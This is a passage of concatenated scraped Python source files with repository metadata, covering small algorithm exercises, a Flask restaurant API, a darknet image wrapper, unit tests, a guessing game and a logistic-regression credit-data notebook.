self.co_latest, self.co_mean, self.nox_latest, self.nox_mean,
self.pmpri_latest, self.pmpri_mean, self.so2_latest, self.so2_mean,
self.voc_latest, self.voc_mean, self.in_violation])
| true |
2451e398988872784f2ea63875660e5ce9c559f4
|
Python
|
AllenKd/algorithm_practice
|
/second_stage/pythagorean_triplet_in_array.py
|
UTF-8
| 435 | 3.421875 | 3 |
[] |
no_license
|
def pythagorean_triplet(arr):
arr = sorted([i ** 2 for i in arr])
for i in range(len(arr)-1, 1, -1):
j = 0
k = i - 1
while j < k:
if arr[j] + arr[k] == arr[i]:
return True
elif arr[j] + arr[k] < arr[i]:
j += 1
else:
k -= 1
return False
if __name__ == '__main__':
print(pythagorean_triplet([3, 1, 4, 6, 5]))
| true |
01b7c371c432dd20ec30b296d6fa0d80c27e47be
|
Python
|
jcai0o0/My_Leetcode_Solutions
|
/September_2020/sep_21_Car_Pooling.py
|
UTF-8
| 376 | 2.828125 | 3 |
[] |
no_license
|
class Solution:
def carPooling(self, trips: List[List[int]], capacity: int) -> bool:
temp = []
for n, start, end in trips:
temp.append((start, n))
temp.append((end, -n))
temp.sort()
par = 0
for i in temp:
par += i[1]
if par > capacity:
return False
return True
| true |
2177b4a7362fb057b88d98a6a863454ef177d15b
|
Python
|
lishion/easy-spider
|
/easy_spider/core/recoverable.py
|
UTF-8
| 2,930 | 3 | 3 |
[] |
no_license
|
from abc import ABC, abstractmethod
from os.path import exists, join
from typing import List
from easy_spider.tool import pickle_load, pickle_dump, get_type_name
class Recoverable(ABC):
@abstractmethod
def stash(self, resource): pass
@abstractmethod
def recover(self, resource): pass
@classmethod
def recover_name(cls): return cls.__name__
@abstractmethod
def can_recover(self, resource): pass
class FileBasedRecoverable(Recoverable, ABC):
"""
利用 pickle 对爬虫进行保存
子类只需要实现 stash_attr_names,给出需要保存的 attr
对于需要保存的所有 attr,会形成字典 {attr1, value1, ..., } 并利用 pickle 保存
恢复时使用 setattr 恢复
"""
def __init__(self):
self._stash_attr_names = self.stash_attr_names()
for attr in self._stash_attr_names:
self._check_stash_attr(attr)
@classmethod
def recover_name(cls):
return super().recover_name() + ".pickle"
def _check_stash_attr(self, attr):
if attr not in self.__dict__:
raise AttributeError("can't find stash attr `{}`".format(attr))
@abstractmethod
def stash_attr_names(self) -> List[str]: pass
def can_recover(self, resource):
return exists(self._get_stash_file_uri(resource))
def _get_stash_file_uri(self, resource):
return join(resource, self.recover_name())
def stash(self, resource):
"""
将需要保存的 attr 存放到 {resource}/{self.__class__.__name__}.pickle
:param resource: 存放文件路径
:return: None
"""
attrs_to_stash = {attr: value for attr, value in self.__dict__.items() if attr in self._stash_attr_names}
pickle_dump(attrs_to_stash, self._get_stash_file_uri(resource))
def recover(self, resource):
"""
从 {resource}/{self.__class__.__name__}.pickle 中恢复
:param resource: 存放文件路径
:return: None
"""
attrs_to_stash = pickle_load(self._get_stash_file_uri(resource))
for attr, value in attrs_to_stash.items():
setattr(self, attr, value)
# class BufferedRecoverable(ABC):
#
# @abstractmethod
# def write(self): pass
#
# @abstractmethod
# def recover(self): pass
class CountDown:
def __init__(self, start):
if start <= 0:
raise ValueError("start must > 1, get `{}`".format(start))
self._start = start
self._now = start
self._actions = []
def add_actions(self, action):
if not callable(action):
raise TypeError("action must be a callable, got `{}`".format(get_type_name(action)))
self._actions.append(action)
def count(self):
self._now -= 1
if self._now == 0:
for action in self._actions:
action()
self._now = self._start
| true |
7ac1d75c5122dad09a7b891d2ad4dc0e0c3536a6
|
Python
|
nikpaa/compress_project
|
/src/tests/lzss_test.py
|
UTF-8
| 1,041 | 2.90625 | 3 |
[] |
no_license
|
import unittest
from lzss import lzss_encode, lzss_decode
class TestLZSSFunctionality(unittest.TestCase):
def test_simple_encode(self):
test_string = bytearray(b'best test in bestest tester fest')
result_string = b'\x0cbest t\t\x05\x06in \t\r\x11\x10\x08er f\x07\x07'
self.assertEqual(lzss_encode(test_string), result_string)
def test_buffer_size_affects_output(self):
test_string = bytearray(b'test test golden retilou test')
self.assertNotEqual(lzss_encode(test_string, 50),
lzss_encode(test_string, 5))
def test_simple_decode(self):
test_string = b'\x14test in a \t\n'
result_string = bytearray(b'test in a test')
self.assertEqual(lzss_decode(test_string), result_string)
def test_simple_encode_decode(self):
test_string = bytearray(b'testing a testy tester in a tester network of testers')
self.assertEqual(lzss_decode(lzss_encode(test_string)), test_string)
if __name__ == '__main__':
unittest.main()
| true |
68e802610a169a6772b26cc5076fa2582da191fa
|
Python
|
Heron593/Heron_project
|
/Python/test_with_open_as.py
|
UTF-8
| 685 | 3.09375 | 3 |
[] |
no_license
|
import re
with open('d:/data.txt', 'w') as f:
f.write('hello world3')
'''open读写模式有:
rU 或 Ua 以读方式打开, 同时提供通用换行符支持 (PEP 278)
w 以写方式打开,
a 以追加模式打开 (从 EOF 开始, 必要时创建新文件)
r+ 以读写模式打开
w+ 以读写模式打开 (参见 w )
a+ 以读写模式打开 (参见 a )
rb 以二进制读模式打开
wb 以二进制写模式打开 (参见 w )
ab 以二进制追加模式打开 (参见 a )
rb+ 以二进制读写模式打开 (参见 r+ )
wb+ 以二进制读写模式打开 (参见 w+ )
ab+ 以二进制读写模式打开 (参见 a+ )'''
| true |
f334afca6ed166b2c18bb37b8c82fc29cc58ddf8
|
Python
|
jfc4050/SLAlgorithms1
|
/Deterministic Selection.py
|
UTF-8
| 1,697 | 3.6875 | 4 |
[] |
no_license
|
def dSelect(arrA, queryIndex, lIndex=0, rIndex=None):
# returns value of arrA[queryIndex]
if rIndex is None:
rIndex = len(arrA)
if lIndex == rIndex:
# terminate if array length reaches 0
return
if rIndex-lIndex <= 5:
# select first element as pivVal if array size is <= 5
pivVal = arrA[lIndex]
else:
# deterministic pivot selection
arrC = []
for i in range(lIndex, rIndex, 5): # each 5 element subarray in arrA:
temp = arrA[i:i+5]
arrC.append(dSelect(arrA[i:i+5], 2)) # find, append it's median to c
# pivVal is "median of medians"
pivVal = dSelect(arrC, len(arrC)//2)
# put pivVal at beginning of array
arrA[arrA.index(pivVal)], arrA[lIndex] = arrA[lIndex], arrA[arrA.index(pivVal)]
# partition arrA around pivVal
boundIndex = lIndex+1
for currentIndex in range(boundIndex, rIndex):
if arrA[currentIndex] < pivVal:
arrA[boundIndex], arrA[currentIndex] = arrA[currentIndex], arrA[boundIndex]
boundIndex += 1
pivIndex = boundIndex-1 #find currentIndex value of pivVal
# place pivVal in rightful position
arrA[lIndex], arrA[pivIndex] = arrA[pivIndex], arrA[lIndex]
# recursive call to make is determined by
# location of queryIndex relative to pivIndex
if queryIndex < pivIndex:
return dSelect(arrA, queryIndex, lIndex, pivIndex)
if pivIndex == queryIndex:
return arrA[pivIndex]
if queryIndex > pivIndex:
return dSelect(arrA, queryIndex, pivIndex+1, rIndex)
array = [0, 9, 7, 4, 2, 3, 5, 1, 6, 8]
print(dSelect(array, 2))
| true |
3a0997b173170edb516c4c105911593be6d297f8
|
Python
|
sikdarsaurav10/RestAPI
|
/zenithApp/webApp/restrauntapi/routes.py
|
UTF-8
| 5,684 | 2.71875 | 3 |
[] |
no_license
|
import random
import string
from flask import Blueprint, jsonify, request, url_for, make_response
from webApp import db
from webApp.models import Food, Menu
from webApp.utils import save_rest_pic, login_required
food = Blueprint('Food', __name__)
# to save or push a new restraunt record
@food.route('/food_details/new', methods=['POST'])
@login_required
def create_food(current_user):
if not current_user.admin:
return make_response('Not permitted!!', 401)
data = request.get_json()
alphabet = string.ascii_letters + string.digits
restraunt_id = ''.join(random.choice(alphabet) for i in range(10))
newFood = Food(restraunt_id=restraunt_id,
name=data['name'],
descp=data['description'],
contact=data['contact'])
db.session.add(newFood)
db.session.commit()
return jsonify({'message': 'Restraunt Record saved'})
# to update a restraunt record in the database
@food.route('/food_details/<restraunt_id>', methods=['PUT'])
@login_required
def update_food(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
rest = Food.query.filter_by(restraunt_id=restraunt_id)\
.first()
if not rest:
return jsonify({'message': 'NO RESTRAUNT FOUND!!'})
data = request.get_json()
rest.name = data['name']
rest.descp = data['description']
rest.contact = data['contact']
db.session.commit()
return jsonify({'message': 'Restraunt Record updated'})
# to delete a restraunt record in the database
@food.route('/food_details/remove', methods=['DELETE'])
@login_required
def delete_food(current_user):
if not current_user.admin:
return make_response('Not permitted!!', 401)
if request.args:
data = request.args.get('restraunt_id')
rest = Food.query.filter_by(restraunt_id=data).first_or_404()
db.session.delete(rest)
db.session.commit()
return jsonify({'message': 'Restraunt Record deleted'})
return ('No argumnets given', 401)
# upload the image for the Restraunt services
@food.route('/food_prof_pic/upload/<restraunt_id>', methods=['PUT'])
@login_required
def upload_food_img(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
file_name = request.files['file']
file_t = save_rest_pic(file_name)
user = Food.query.filter_by(restraunt_id=restraunt_id).first_or_404()
user.prof_img = file_t
db.session.commit()
return jsonify({'message': 'File saved successfully',
'file name': file_t})
# to get the restraunt profile pic
@food.route('/food_prof_pic/<restraunt_id>', methods=['GET'])
def get_rest_prof_pic(restraunt_id):
img_query = Food.query.filter_by(restraunt_id=restraunt_id).first()
image_file = url_for('static', filename='images/restraunt_service_img/' + img_query.prof_img)
return jsonify({'restraunt_prof_img_url': image_file})
# to get all the Restraunt services
@food.route('/food_details', methods=['GET'])
@login_required
def get_rest(current_user):
page = request.args.get('page', 1, type=int)
allFood = Food.query.paginate(page=page, per_page=10)
output = []
for rest in allFood.items:
output_data = {}
output_data['restraunt_id'] = rest.restraunt_id
output_data['name'] = rest.name
output_data['desription'] = rest.descp
output_data['contact'] = rest.contact
output_data['prof_img'] = rest.prof_img
output.append(output_data)
return jsonify({'All Restraunts': output})
# get the menu for the specific restraunt
@food.route('/food_menu/<restraunt_id>', methods=['GET'])
@login_required
def get_food_menu(current_user, restraunt_id):
rest = Food.query.filter_by(restraunt_id=restraunt_id).first()
menuItem = Menu.query.filter_by(restraunt=rest).all()
output = []
for item in menuItem:
output_data = {}
output_data['id'] = item.id
output_data['food_item'] = item.food_item
if not item.item_type:
output_data['Type'] = 'Veg'
elif item.item_type:
output_data['Type'] = 'Non Veg'
output.append(output_data)
return jsonify({'Menu': output})
# upload the menu for the specific restraunt
@food.route('/food_menu/new/<restraunt_id>', methods=['POST'])
@login_required
def upload_food_menu(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
if request.is_json:
data = request.get_json()
rest = Food.query.filter_by(restraunt_id=restraunt_id).first()
menu = Menu(food_item=data['item'], item_type=data['type'],
restraunt=rest)
db.session.add(menu)
db.session.commit()
return jsonify({'message': 'Saved', 'Item': data['item']})
return make_response('No Menu Items given', 401)
# delete the menu for the specific restraunt
@food.route('/food_menu/remove/<restraunt_id>', methods=['DELETE'])
@login_required
def delete_food_menu(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
if request.args:
data = request.args
rest = Food.query.filter_by(restraunt_id=restraunt_id)\
.first_or_404()
id = data['id']
menu = Menu.query.filter_by(restraunt=rest).filter(Menu.id == id)\
.first()
db.session.delete(menu)
db.session.commit()
return jsonify({'message': 'deleted'})
return make_response('No Menu Items given', 401)
| true |
8ba7c0a13ef72657bb1eb02578f777cffbfaed18
|
Python
|
lessunc/python-guanabara
|
/task058.py
|
UTF-8
| 1,272 | 4.34375 | 4 |
[
"MIT"
] |
permissive
|
#coding: utf-8
#-----------------------------------------------------------------
# Um jogo em que o programa escolhe um número entre 0 e 10.
# Pedindo em seguida que o jogador adivinhe qual foi, recebendo
# valores até que esse seja igual ao escolhido pelo programa, e
# retornando quantas partidas foram necessárias para adivinhar.
#------------------------------------------------------------------
# Jogo da Adivinhação v2.0 - Exercício #058
#------------------------------------------------------------------
from random import randint
tentativas = 1
print('\033[1;35mSou seu computador...\033[m')
print('Acabei de pensar em um número entre 1 e 10.')
print('Será que você consegue adivinhar qual foi?')
gerador = randint(1,10)
acertou = False
while not acertou:
n = int(input('\n\033[35mQual é seu palpite: \033[m'))
if n == gerador:
acertou = True
else:
if n < gerador:
print(f'Mais.. Tente outra vez.')
tentativas += 1
elif n > gerador:
print(f'Menos.. Tente outra vez.')
tentativas += 1
print('\033[1;35m---\033[m' * 11) #linha colorida(not important)
print(f'Acertou com {tentativas} tentativas.. \033[35m:)')
if tentativas <= 4:
print('Muito Bom! Parabéns!\033[m')
else:
print('Tente Novamente!\033[m')
print()
| true |
82a32f62172bfcd943b1ea9dbe1adddce00732b8
|
Python
|
flrobson77/febrace
|
/facesample08.py
|
UTF-8
| 601 | 3.171875 | 3 |
[] |
no_license
|
import face_recognition
import os
from PIL import Image
image = face_recognition.load_image_file('./images/robrodtar.jpg')
face_locations = face_recognition.face_locations(image)
#(Array) Coordenadas de rostos encontrados
print ("Foram encontraas ", format(len(face_locations)), "face(s) nessa imagem")
for face_location in face_locations:
top, right, bottom, left = face_location
face_image = image[top:bottom, left:right]
pil_image = Image.fromarray(face_image)
pil_image.show()
espeak.synth (format(len(face_locations)))
espeak.synth ("faces")
espeak.synth ("encontradas")
| true |
70a238a363498d0ce4d8f113c2e655834bccc499
|
Python
|
MFarelS/instagram_static
|
/main.py
|
UTF-8
| 2,011 | 2.640625 | 3 |
[] |
no_license
|
import requests, threading,time
from datetime import datetime
import matplotlib.pyplot as plt
hed = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0'}
trakhir = 0
krg = 0
pengurangan = [0,0,0,0,0,0,0] #ambil 6 data atau 60 menit
ttt = ['60 Menit lalu','50 Menit lalu','40 Menit lalu','30 Menit lalu','20 Menit lalu','10 Menit lalu']
def jam():
f = datetime.now().strftime("%H:%M:%S")
return f
def chart():
def autolabel(rects):
for rect in rects:
height = rect.get_height()
plt.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 2), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
p = plt.bar(ttt, pengurangan[-6:], color='r')
autolabel(p)
plt.xticks(rotation = 20)
plt.savefig('p.jpg')
with open('per10-Minute.txt', 'a') as tls:
tls.write(f'{pengurangan[-1]} ---- {jam()}\n')
# plt.cla()
# plt.clf()
#plt.close('all')
def hitung(jumlah):
#print('Followers : ', jumlah)
plt.figure(dpi=100)
dt = []
pjg = len(jumlah)
p = jumlah
if pjg > 3:
sisa = pjg % 3
jml = pjg //3
if sisa != 0:
dt.append(p[:sisa])
p = p[sisa:]
for i in range(jml):
dt.append(p[:3])
p = p[3:]
jumlah = '.'.join(dt)
return jumlah
def st(nama):
global trakhir, krg
sec = 0
while True:
try:
js = requests.get('https://www.instagram.com/{}/channel/?__a=1'.format(nama), headers=hed).json()
jml = js['graphql']['user']['edge_followed_by']['count']
if trakhir == 0:
trakhir = jml
if jml < trakhir:
y = ('-'+str(trakhir-jml))
krg += trakhir-jml
else:
y = ('+'+str(jml-trakhir))
krg -= jml-trakhir
print('Follower : ',hitung(str(jml)), f' ({y}')
trakhir = jml
except:
pass
if sec == 1:
if krg < 0 :
krg = 0
pengurangan.append(krg)
sec = 0
krg = 0
t = threading.Thread(target=chart)
t.start()
sec += 1
time.sleep(1)
if __name__ == '__main__':
name = input('Username : ')
st(name)
| true |
5fbbd9d3cfc0fdb1f11a7b7cea5e6621a089aaa2
|
Python
|
h3nok/MLIntro
|
/Notebooks/core/database/data_mappers/test_classification_group.py
|
UTF-8
| 1,622 | 2.65625 | 3 |
[] |
no_license
|
from unittest import TestCase
from data_mappers.classification_group import viNetClassGroup, viNetClassGroupMapper
from tabulate import tabulate
from vinet_frame_label import viNetTrainingFrameLabel
class TestClassGroupMapper(TestCase):
class_group = viNetClassGroup('Python-Test-Classification-Group', comment="Test Case")
cgm = viNetClassGroupMapper(class_group)
def test__get(self):
groups = self.cgm.get_persisted_data()
if not groups.empty:
print(tabulate(groups, headers='keys', tablefmt='psql'))
else:
self.fail()
def test_insert(self):
if not isinstance(self.cgm.insert(), bool):
self.fail()
def test_update(self):
# 1. Create classification group
class_group = viNetClassGroup(name="E3 LSE 5 class-Test",
comment="WTE, Buzzard, "
"Other-Avian,"
"Red-Kite, LSE")
with viNetClassGroupMapper(class_group) as cgm:
# 2. Create a list of classifications to be grouped together
classifications = [viNetTrainingFrameLabel("Buzzard-sp", False),
viNetTrainingFrameLabel("Eurasian-Buzzard", False),
viNetTrainingFrameLabel("Buzzard", False)]
# 3. A group class name for the above list
mapped_to = viNetTrainingFrameLabel('Buzzard', False)
# 4. Map frame groundtruth to class group names
cgm.map_classifications(classifications, mapped_to)
| true |
712a88c36db609ca313b1c80af4a244b563d9bb1
|
Python
|
Showherda/aoc2020
|
/aoc_09_2.py
|
UTF-8
| 363 | 2.8125 | 3 |
[] |
no_license
|
import sys
sys.stdin=open('input.txt')
inp=[int(v) for v in sys.stdin.readlines()]
n=len(inp)
val=542529149
num=inp.copy()
for i in range(1, n):
num[i]+=num[i-1]
p1=0
while p1<n:
p2=p1
while num[p2]-num[p1]<val:
p2+=1
if p2-p1>1 and num[p2]-num[p1]==val:
print(min(inp[p1+1:p2+1])+max(inp[p1+1:p2+1]))
while p2>p1 and num[p2]-num[p1]>val:
p1+=1
p1+=1
| true |
6dc9e83e24d1a2e0243fc5b60b1ac4f41a843a7f
|
Python
|
Lv-474-Python/ngfg
|
/src/tests/app/helper/test_row_validation.py
|
UTF-8
| 1,062 | 3.125 | 3 |
[] |
no_license
|
"""
Tests for a google sheet row validator
"""
from app.helper.row_validation import validate_row
def test_validate_row_valid():
"""
Test for validate_row()
Test case for when row has been specified correctly
"""
row = 'AAA123'
assert validate_row(row) is True
def test_validate_row_extra_letters():
"""
Test for validate_row()
Test case for when row parameter is invalid because of extra letters
"""
row_extra_letters = 'AAAA123'
assert validate_row(row_extra_letters) is False
def test_validate_row_non_empty_split():
"""
Test for validate_row()
Test case for when row parameter is invalid because of a non-empty string at the end after the split
"""
row_non_empty_split = 'AAA123AAA'
assert validate_row(row_non_empty_split) is False
def test_validate_row_extra_splits():
"""
Test for validate_row()
Test case for when row parameter is invalid because of extra symbols
"""
row_extra_splits = 'AAA123AAA123'
assert validate_row(row_extra_splits) is False
| true |
0f542843dcc5a0fd107b8f96a917e5da8bfc11dc
|
Python
|
Nahom-S/python-file
|
/amharic app.py
|
UTF-8
| 686 | 2.921875 | 3 |
[] |
no_license
|
from tkinter import *
me = Tk()
me.title("ልምምድ")
e = Entry(me, width=35, bg="blue", fg="yellow", borderwidth=5)
e.grid(row=0, column=1, columnspan=1, padx=40, pady=40)
def button1():
try:
x = e.get()
e.delete(0, END)
c = int(x) + 1
e.insert(0, c)
except:
e.delete(0, END)
e.insert(0, "ቁጥር ያስገቡ")
button1 = Button(me, text="አንድ ጨምር", bg="red", fg="green", padx=20, pady=10, command=button1)
button1.grid(row=1, column=1)
xx = Label(me, text=" አሁን እዚህ ቁጥር ላይ ነን------->", padx=30, pady=30)
xx.grid(row=0, column=0)
me.mainloop()
| true |
74ec49b19db64ebcbb1d43b9f7f27ba182b5313c
|
Python
|
troyhonegger/agbot-srvr
|
/lib/darknet_wrapper.py
|
UTF-8
| 2,027 | 2.671875 | 3 |
[] |
no_license
|
'''
This module allows us to run darknet on in-memory images, rather than writing an image to
disk and then reading it again using darknet. This should substantially speed up the process.
Admittedly, most of this is shamelessly copied off the Internet, with very minimal modifications.
Credits go to Glenn Jocher for a blog post with most of this code - find it online at
https://medium.com/@glenn.jocher/i-was-searching-for-a-fast-darknet-python-binding-also-but-found-what-i-needed-natively-within-the-11fcb76fe31e
'''
from darknet import *
def array_to_image(arr):
arr = arr.transpose(2, 0, 1)
c = arr.shape[0]
h = arr.shape[1]
w = arr.shape[2]
arr = (arr / 255.0).flatten()
data = c_array(c_float, arr)
# I don't think darknet should change any of this. So we should be alright
# without freeing im
im = IMAGE(w, h, c, data)
return im
def detect_cv2(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
if isinstance(image, bytes):
# image is a filename
# i.e. image = b'/darknet/data/dog.jpg'
im = load_image(image, 0, 0)
elif isinstance(image, str):
im = load_image(image.encode('utf-8'), 0, 0)
else:
# image is a numpy array
# i.e. image = cv2.imread('/darknet/data/dog.jpg')
im = array_to_image(image)
rgbgr_image(im)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im)
dets = get_network_boxes(net, im.w, im.h, thresh,
hier_thresh, None, 0, pnum)
num = pnum[0]
if nms: do_nms_obj(dets, num, meta.classes, nms)
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
res.append((meta.names[i], dets[j].prob[i],
(b.x, b.y, b.w, b.h)))
res = sorted(res, key=lambda x: -x[1])
if isinstance(image, bytes) or isinstance(image, str): free_image(im)
free_detections(dets, num)
return res
| true |
bb64ca6c4a927ef11c2325923372e914579449b5
|
Python
|
BIRDDYTTP/elabProgrammingConcept
|
/python/trial/กบกระโดด.py
|
UTF-8
| 580 | 3.984375 | 4 |
[] |
no_license
|
depth = int(input("Enter the depth of the well : "))
jump = int(input("Enter the height the frog can jump : "))
slip = int(input("Enter the height the frog slips down : "))
day = 1
if jump == slip:
print("The frog will never escape from the well.")
else:
while depth > jump :
leaps = depth - jump
print("On day %d the frog leaps to the depth of %d meters." %(day,leaps))
depth = leaps + slip
print("At night he slips down to the depth of %d meters." %depth)
day += 1
print("The frog can escape the well on day %d." %day)
| true |
b39a12b1e2fc5afc819743a89686db86824055c0
|
Python
|
IngabireTina/m_blog
|
/tests/comment_test.py
|
UTF-8
| 1,585 | 2.59375 | 3 |
[] |
no_license
|
import unittest
from app.models import Comment, Blog, User
from app import db
class CommentModelTest(unittest.TestCase):
def setUp(self):
self.new_comment = Comment(id = 1, comment = 'comment', user = self.user_tina, blog_id = self.new_blog)
def tearDown(self):
Blog.query.delete()
User.query.delete()
def test_check_instance_variables(self):
self.assertEquals(self.new_comment.comment,'comment')
self.assertEquals(self.new_comment.user,self.user_tina)
self.assertEquals(self.new_comment.blog_id,self.new_blog)
class CommentModelTest(unittest.TestCase):
def setUp(self):
self.user_tina = User(username='tina', password='tina', email='tina@gmail.com')
self.new_blog = Blog(id=1, title='Test', post='post', user_id=self.user_tina.id)
self.new_comment = Comment(id=1, comment ='comment', user_id=self.user_tina.id, blog_id = self.new_blog.id )
def tearDown(self):
Blog.query.delete()
User.query.delete()
Comment.query.delete()
def test_check_instance_variables(self):
self.assertEquals(self.new_comment.comment, 'comment')
self.assertEquals(self.new_comment.user_id, self.user_tina.id)
self.assertEquals(self.new_comment.blog_id, self.new_blog.id)
def test_save_comment(self):
self.new_comment.save()
self.assertTrue(len(Comment.query.all()) > 0)
def test_get_comment(self):
self.new_comment.save()
got_comment = Comment.get_comment(1)
self.assertTrue(get_comment is not None)
| true |
7be7588b778c00f9a7f6f46d33588be5cdb6bcf6
|
Python
|
jeffrey-hsu/w266-project-patent
|
/bag_of_words/patent_counter.py
|
UTF-8
| 1,913 | 3.21875 | 3 |
[] |
no_license
|
'''Simply counts the number of patents in the
csv file.'''
from datetime import datetime as dt
def clump(filename):
'''Sorts through the lines, combining them according
to patent number, and outputs the joined text.'''
# Initialize values
last_patent_number = 0
clump_text = ''
with open(filename, 'r') as f:
# line = [patent number, claim number, claim text, dependencies,
# ind_flg, appl_id.]
for i, line in enumerate(f):
# Ignore the header
if i == 0:
pass
else:
# Retrieve patent number and text, according to format
if '"' in line:
patent_no = line.split('"')[0].split(',')[0]
claim_text = line.split('"')[1]
else:
patent_no = line.split(',')[0]
claim_text = line.split(',')[2]
# Add to the string if it's the same patent as the last line
if patent_no == last_patent_number:
clump_text = ' '.join((clump_text, claim_text))
# Output the old line if a new patent is encountered,
# and reset the values for patent number and text
else:
if last_patent_number != 0:
yield last_patent_number, clump_text
last_patent_number = patent_no
clump_text = claim_text
yield last_patent_number, clump_text # Output the last clump as well
base_file_path = '/home/cameronbell/'
patent_claims_file = ''.join((base_file_path, 'patent_data/patent_claims_fulltext.csv'))
print(dt.now())
print('Starting to iterate')
for i, clump in enumerate(clump(patent_claims_file)):
if i%1000000 == 0:
print('%i patents processed.' % i)
count = i
print('Finished. Total clumps: %i' % count)
print(dt.now())
| true |
54830ebe784b155875ae9ed5bcd35094ee19536a
|
Python
|
PengFrankJi/machine_learning
|
/LogisticRegression/Logistic.py
|
UTF-8
| 6,314 | 2.5625 | 3 |
[] |
no_license
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import statsmodels.api as sm
import pylab as pl
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import statsmodels.api as sm
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_curve, auc ###计算roc和auc
# In[2]:
# read the excel file
file_path = "/Users/jipeng/Documents/Study/Study_myself/Logistic_Regression/data.xlsx"
file = pd.ExcelFile(file_path)
data = file.parse("data")
# Variables unrelated to the model:id, member_id,
# Variables having only one value: term
# Variables have repeated meaning: label: loan_status, \[home_mort, home_own\]: home_ownership,
# In[3]:
columns_to_keep = ["label", "loan_amnt", "issue_d", "int_rate", "installment", "grade", "emp_length", "home_mort", "home_own", "FICO", "annual_inc", "loantoincome", "dti", "delinq_2yrs", "inq_last_6mths", "open_acc", "pub_rec", "revol_bal", "revol_util", "total_acc", "tot_cur_bal", "total_rev_hi_lim", "acc_open_past_24mths", "avg_cur_bal", "bc_open_to_buy", "bc_util", "mo_sin_old_il_acct", "mo_sin_old_rev_tl_op", "mo_sin_rcnt_rev_tl_op", "mo_sin_rcnt_tl", "mort_acc", "mths_since_recent_bc", "num_accts_ever_120_pd", "num_actv_bc_tl", "num_actv_rev_tl", "num_bc_sats", "num_bc_tl", "num_il_tl", "num_op_rev_tl", "num_rev_accts", "num_rev_tl_bal_gt_0", "num_sats", "num_tl_op_past_12m", "pct_tl_nvr_dlq", "percent_bc_gt_75", "tot_hi_cred_lim", "total_bal_ex_mort", "total_bc_limit", "total_il_high_credit_limit"]
data = data[columns_to_keep]
# In[4]:
def convert_date_to_month(x):
if x == np.datetime64('2020-01-14'):
return 1
elif x == np.datetime64('2020-02-14'):
return 2
elif x == np.datetime64('2020-03-14'):
return 3
elif x == np.datetime64('2020-04-14'):
return 4
elif x == np.datetime64('2020-05-14'):
return 5
elif x == np.datetime64('2020-06-14'):
return 6
elif x == np.datetime64('2020-07-14'):
return 7
elif x == np.datetime64('2020-08-14'):
return 8
data["issue_d"] = [convert_date_to_month(i) for i in data['issue_d']]
# In[5]:
data = pd.concat([data, pd.get_dummies(data['grade'], prefix = 'grade').iloc[:, 1:]], axis = 1)
data = pd.concat([data, pd.get_dummies(data['emp_length'], prefix = 'emp_length').iloc[:, 1:]], axis = 1)
data = data.drop(['grade', 'emp_length'], axis = 1)
# In[6]:
data.head(30)
# In[7]:
# check how many NA's
print(np.where(np.isnan(data)))
print(data.columns[24])
print(np.where(np.isnan(data))[0].shape)
# there are 3075 NA's. We can delete observations containing NA
data = data.dropna()
# In[8]:
f = lambda x: (x - x.min()) / (x.max()-x.min())
data = data.apply(f)
# In[9]:
y = data['label']
x = data.iloc[:, 1:]
x['intercept'] = 1.0
np.random.seed(seed = 9)
row = x.shape[0]
shuffle_indexes = np.random.permutation(row)
train_ratio = 0.7
train_size = int(row * train_ratio)
train_x = x.iloc[shuffle_indexes[0: train_size], :]
test_x = x.iloc[shuffle_indexes[train_size: ], :]
train_y = y.iloc[shuffle_indexes[0: train_size]]
test_y = y.iloc[shuffle_indexes[train_size: ]]
# In[10]:
model1 = sm.Logit(train_y, train_x).fit()
model1.summary()
# According to the P-values, we pick the variables that are significant.
# In[11]:
columns_to_keep = ["issue_d", "int_rate", "home_mort", "home_own", "FICO", "loantoincome", "dti", "delinq_2yrs", "inq_last_6mths", "pub_rec", "acc_open_past_24mths", "mo_sin_old_il_acct", "mort_acc", "mths_since_recent_bc", "num_rev_accts", "num_rev_tl_bal_gt_0", "pct_tl_nvr_dlq", "percent_bc_gt_75", "total_bal_ex_mort", "total_il_high_credit_limit", "grade_B", "grade_C", "grade_D", "grade_E", "grade_F", "grade_G", "emp_length_10+ years", "emp_length_2 years", "emp_length_3 years", "emp_length_4 years", "emp_length_5 years", "emp_length_6 years", "emp_length_7 years", "emp_length_8 years", "emp_length_9 years", "emp_length_< 1 year", "intercept"]
train_x = train_x[columns_to_keep]
test_x = test_x[columns_to_keep]
model2 = sm.Logit(train_y, train_x).fit()
model2.summary()
# In[12]:
predict_prob = model2.predict(test_x)
threshold_position = sum(test_y == 1)
threshold = sorted(predict_prob, reverse=True)[threshold_position]
predict_y = predict_prob.apply(lambda x: 1 if x > threshold else 0)
test_y_list = test_y.values.tolist()
predict_y_list = predict_y.values.tolist()
tp = sum((predict_y == 1).values.tolist() and (test_y == 1).values.tolist()) # True Positive
fn = sum((predict_y == 0).values.tolist() and (test_y == 1).values.tolist()) # False Negative
fp = sum((predict_y == 1).values.tolist() and (test_y == 0).values.tolist()) # False Positive
tn = sum((predict_y == 0).values.tolist() and (test_y == 0).values.tolist()) # True Negative
matrix_of_confusion = pd.DataFrame([[tp, fp, tp + fp],
[fn, tn, fn + tn],
[tp + fn, fp + tn, tp + fp + fn + tn]],
columns = ["actual good", "actual bad", "total"],
index = ["predicted good", "predicted bad", "total"])
matrix_of_confusion
# In[13]:
f,ax=plt.subplots()
conf_matrix = confusion_matrix(test_y, predict_y)
print(conf_matrix) #打印出来看看
sns.heatmap(conf_matrix, annot=True, ax=ax) #画热力图
ax.set_title('confusion matrix') #标题
ax.set_xlabel('predict') #x轴
ax.set_ylabel('actual') #y轴
# In[14]:
fpr, tpr, thresholds = roc_curve(test_y, predict_prob)
roc_auc =auc(fpr, tpr)
plt.figure()
lw = 2
plt.figure(figsize=(10,10))
